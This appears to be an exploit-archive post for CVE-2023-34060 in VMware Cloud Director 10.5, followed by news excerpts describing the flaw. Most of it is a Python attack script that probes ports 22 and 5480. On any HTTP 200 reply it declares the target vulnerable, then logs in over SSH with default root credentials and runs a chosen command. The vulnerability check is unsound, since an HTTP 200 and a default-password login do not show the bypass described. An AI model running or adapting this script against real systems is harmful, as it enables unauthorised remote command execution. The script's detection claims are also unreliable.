VMware Cloud Director 10.5 Authentication Bypass
VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]

import argparse
import socket
import threading

import paramiko
import requests


# Check whether a TCP port on the target accepts connections
def is_port_open(ip, port):
    # Create a TCP socket with a 1 second connect timeout
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except (socket.timeout, OSError):
        # The port is closed or filtered
        return False
    finally:
        # Always release the socket
        s.close()


# Connect over SSH with the supplied credentials and run one command
def exploit_device(ip, port, username, password, command):
    client = paramiko.SSHClient()
    # Accept any host key (the target's key is not verified)
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Use the username/password passed on the command line (the original
    # hard-coded "root"/"vmware" here and ignored these parameters)
    client.connect(ip, port, username, password,
                   allow_agent=False, look_for_keys=False)
    stdin, stdout, stderr = client.exec_command(command)
    print(f"The output of the command {command} on the device "
          f"{ip}:{port} is: {stdout.read().decode()}")
    client.close()


def main():
    # Parse the arguments from the user
    parser = argparse.ArgumentParser(
        description="A Python program to detect and exploit the "
                    "CVE-2023-34060 vulnerability in VMware Cloud Director")
    parser.add_argument("ip", help="The target IP address")
    parser.add_argument("-p", "--ports", nargs="+", type=int,
                        default=[22, 5480], help="The target ports to check")
    parser.add_argument("-u", "--username", default="root",
                        help="The username for ssh")
    parser.add_argument("-w", "--password", default="vmware",
                        help="The password for ssh")
    parser.add_argument("-c", "--command", default="hostname",
                        help="The command to execute on the vulnerable devices")
    args = parser.parse_args()

    # Loop through the ports and check for the vulnerability
    for port in args.ports:
        if not is_port_open(args.ip, port):
            print(f"Port {port} is closed")
            continue
        # The port is open: send a GET request and check the status code.
        # A connection error (e.g. a non-HTTP service) is treated as not
        # vulnerable instead of crashing the whole scan.
        try:
            response = requests.get(f"http://{args.ip}:{port}", timeout=5)
            status = response.status_code
        except requests.RequestException:
            status = None
        if status == 200:
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Exploit the device in a separate thread
            thread = threading.Thread(
                target=exploit_device,
                args=(args.ip, port, args.username, args.password, args.command))
            thread.start()
        else:
            print(f"Port {port} is not vulnerable to CVE-2023-34060")


if __name__ == "__main__":
    main()
Related news
VMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections. Tracked as CVE-2023-34060 (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an older version. "On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with
VMware Cloud Director Appliance contains an authentication bypass vulnerability in the case where VMware Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console). This bypass is not present on port 443 (VCD provider and tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.